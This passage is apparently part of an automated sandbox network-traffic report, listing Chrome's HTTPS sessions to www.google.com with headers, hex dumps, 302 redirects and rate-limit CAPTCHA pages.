o5dFpZbFE0VGRHNlRLMk1qSVBZOXVlZjQwWUo1SXlqak85RzRrRU8wRW4ySjduNDAvZjhBMGZqaUd0bUF2M2t6NTc2OEZKajIxbTlCNmxyYUJ0MGpzd2syeDhuc0JuSGI3bmpWc3ZyTlF5aWRwbHljWkJKR2ZJMWZQbXkxN09lc3I5RG4rR3g1R2dyOVhwWmJIVzNDVXJ0cDRpNmh1ek4yVWZKd1BuU3RVZXM0RTNiSnFoaXZKRzhEVkQ2cnZVO
2024-04-29 09:36:37 UTC	1255	IN	Data Raw: 36 33 34 0d 0a 52 56 6b 77 64 54 49 72 5a 58 5a 74 61 6b 31 72 56 55 6f 32 59 30 4d 30 61 33 46 48 65 6e 4e 53 55 32 5a 4b 4e 32 56 4f 52 31 42 59 63 54 68 54 55 6c 5a 54 55 31 4a 7a 4b 31 52 47 56 55 4e 4f 62 47 4a 43 65 6e 52 50 55 44 68 42 63 30 31 6e 61 6e 70 79 54 6e 42 68 59 6d 70 52 55 54 51 32 5a 47 4a 4b 59 30 52 4f 56 56 56 35 65 6c 4a 69 63 33 5a 44 63 33 46 78 51 30 52 72 57 54 63 32 64 48 52 7a 59 6e 68 4f 52 69 74 46 57 6c 5a 69 53 6b 74 70 56 45 74 75 4f 57 31 36 62 6a 51 78 56 44 46 44 57 45 39 73 54 31 70 4b 62 44 4e 42 5a 32 52 50 55 6c 4e 79 62 6c 42 69 5a 79 73 72 62 30 70 78 4e 6e 4a 77 62 6d 46 4c 63 32 6c 75 61 57 74 4c 5a 7a 64 48 61 45 39 54 55 44 42 43 65 44 55 77 64 6c 68 72 5a 6b 6c 70 54 6b 5a 78 59 56 4e 32 4e 6e 56 5a 53 31 Data Ascii: 634RVkwdTIrZXZtak1rVUo2Y0M0a3FHenNSU2ZKN2VOR1BYcThTUlZTU1JzK1RGVUNObGJCenRPUDhBc01nanpyTnBhYmpRUTQ2ZGJKY0ROVVV5elJic3ZDc3FxQ0RrWTc2dHRzYnhORitFWlZiSktpVEtuOW16bjQxVDFDWE9sT1pKbDNBZ2RPUlNyblBiZysrb0pxNnJwbmFLc2luaWtLZzdHaE9TUDBCeDUwdlhrZklpTkZxYVN2NnVZS1
2024-04-29 09:36:37 UTC	340	IN	Data Raw: 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 72 65 6c 65 76 61 6e 63 65 22 3a 5b 31 32 35 37 2c 31 32 35 36 2c 31 32 35 35 2c 31 32 35 34 2c 31 32 35 33 2c 31 32 35 32 2c 31 32 35 31 2c 31 32 35 30 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 73 75 62 74 79 70 65 73 22 3a 5b 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 5d 2c 22 67 6f 6f 67 6c Data Ascii: 002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"googl
2024-04-29 09:36:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49712	142.250.191.196	443	6264	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 09:36:37 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-29 09:36:38 UTC	1815	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgRRtT5aGKXUvbEGIjA238wcEXL0ZhP0SC2ZjrB5AGUw8VRCsMRrDZYQqy4aVGG5bDynshITRamrktaGYZMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgsIptS9sQYQp-KtXxIEUbU-Wg Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Mon, 29 Apr 2024 09:36:38 GMT Server: gws Content-Length: 427 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-04-29-09; expires=Wed, 29-May-2024 09:36:38 GMT; path=/; domain=.google.com; Secure; SameSite=none Set-Cookie: NID=513=iKF3zgbguxLbgN994wCPViP6UbiAAtMj4u72SFJOZR2j2hkJpxBANvBa9O5o9I3707thiGIhpr9YMpoChjPyChWsEE8GusGsh-1BweTJZbwCNT8MRI29hSZynpU0B6cVrbjhyvvRt-DcmFpEWy8yvWiHRan43jkneKAQzhihk1o; expires=Tue, 29-Oct-2024 09:36:37 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-29 09:36:38 UTC	427	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 64 64 6c 6a 73 6f 6e 25 33 46 61 73 79 6e Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasyn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49713	142.250.191.196	443	6264	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 09:36:37 UTC	506	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIkqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw== Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-29 09:36:38 UTC	1842	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRRtT5aGKXUvbEGIjDdp0aB_5C1gr2eixUtAMj4mBUQzkJ9vh0Q2d77njF6aqNILXZ84lvrwl1-Gwx1dfsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgsIptS9sQYQhNrQdxIEUbU-Wg Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Mon, 29 Apr 2024 09:36:38 GMT Server: gws Content-Length: 458 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-04-29-09; expires=Wed, 29-May-2024 09:36:38 GMT; path=/; domain=.google.com; Secure; SameSite=none Set-Cookie: NID=513=i4vGxEho67hIbT78H4sdvR3RiGAbuswNQATGLpxg1ZwbZWfPfJEEpO9gKebEs9GpjkyVn_LdpJxbX71dSG1YWSxKprI50Iw_R0SzrRyArmtuuOy3FX2os12m5mg3IOH4454YlQzymsc0wKOKj9gGLzAcNZLcSnF8tYSI_CuAr-Y; expires=Tue, 29-Oct-2024 09:36:37 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-29 09:36:38 UTC	458	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49715	142.250.191.196	443	6264	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 09:36:37 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-29 09:36:38 UTC	1760	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRRtT5aGKXUvbEGIjD-kgWdpW8hT-9hc2nj_b9H1bs6sOSvG1viHx2oR-H037B_HudVAHyts9ARK3nBSXsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgsIptS9sQYQp-PGURIEUbU-Wg Content-Type: text/html; charset=UTF-8 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Mon, 29 Apr 2024 09:36:38 GMT Server: gws Content-Length: 417 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-04-29-09; expires=Wed, 29-May-2024 09:36:38 GMT; path=/; domain=.google.com; Secure; SameSite=none Set-Cookie: NID=513=eegqcU8czylrZKezFcMw6KWL6vQwBujDj2ABLhpOoBb0lWAOvzeNu969cSPHJ7hNTM2x-P6AvBxYP9yREpeyIKCw7DXLk8T0qojTieH2VISxt8Mvxyl6rytQbK8lFHQkUxvetMEGrzxPSMPA_Yc2K8PvEto5bk8KHhZPZ0MIs6c; expires=Tue, 29-Oct-2024 09:36:37 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-29 09:36:38 UTC	417	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49720	142.250.191.196	443	6264	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 09:36:38 UTC	738	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRRtT5aGKXUvbEGIjD-kgWdpW8hT-9hc2nj_b9H1bs6sOSvG1viHx2oR-H037B_HudVAHyts9ARK3nBSXsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-04-29-09; NID=513=i4vGxEho67hIbT78H4sdvR3RiGAbuswNQATGLpxg1ZwbZWfPfJEEpO9gKebEs9GpjkyVn_LdpJxbX71dSG1YWSxKprI50Iw_R0SzrRyArmtuuOy3FX2os12m5mg3IOH4454YlQzymsc0wKOKj9gGLzAcNZLcSnF8tYSI_CuAr-Y
2024-04-29 09:36:38 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Mon, 29 Apr 2024 09:36:38 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3111 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-29 09:36:38 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
2024-04-29 09:36:38 UTC	1255	IN	Data Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 32 45 55 35 67 59 53 39 30 39 5a 5a 65 75 30 61 67 43 67 6e 44 68 78 43 4f 32 5a 57 48 56 31 45 62 Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="2EU5gYS909ZZeu0agCgnDhxCO2ZWHV1Eb
2024-04-29 09:36:38 UTC	957	IN	Data Raw: 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e Data Ascii: ogle automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solvin

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49721	142.250.191.196	443	6264	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 09:36:38 UTC	908	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRRtT5aGKXUvbEGIjDdp0aB_5C1gr2eixUtAMj4mBUQzkJ9vh0Q2d77njF6aqNILXZ84lvrwl1-Gwx1dfsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIkqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw== Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-04-29-09; NID=513=i4vGxEho67hIbT78H4sdvR3RiGAbuswNQATGLpxg1ZwbZWfPfJEEpO9gKebEs9GpjkyVn_LdpJxbX71dSG1YWSxKprI50Iw_R0SzrRyArmtuuOy3FX2os12m5mg3IOH4454YlQzymsc0wKOKj9gGLzAcNZLcSnF8tYSI_CuAr-Y
2024-04-29 09:36:38 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Mon, 29 Apr 2024 09:36:38 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3183 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-29 09:36:38 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&asy
2024-04-29 09:36:38 UTC	1255	IN	Data Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 6f 56 66 62 75 6b 63 6a 66 Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="oVfbukcjf
